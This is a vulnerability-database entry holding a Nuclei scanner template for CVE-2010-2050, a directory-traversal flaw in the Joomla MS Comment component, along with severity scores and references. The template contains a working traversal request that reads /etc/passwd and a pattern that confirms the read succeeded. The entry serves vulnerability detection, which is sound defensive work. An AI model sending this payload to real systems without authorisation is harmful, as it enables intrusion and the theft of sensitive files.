Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2050
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component MS Comment 0.8.0b - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
7

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

Low

0.035 Low

EPSS

Percentile

91.6%

A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-2050

info:
  name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12611
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2050
    - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt
    - http://www.vupen.com/english/advisories/2010/1159
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58619
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2050
    cwe-id: CWE-22
    epss-score: 0.03527
    epss-percentile: 0.91571
    cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: m0r0n
    product: com_mscomment
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,m0r0n

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022072cdaa8c8561d8f802f104a5587be461af0eb4068f8539cb2d673d1e790ae79202205b5ae21b73e9b12635e1776cf8473fec583f1718d6a3bda5b9cc30605ba6b242:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

Low

0.035 Low

EPSS

Percentile

91.6%

Related for NUCLEI:CVE-2010-2050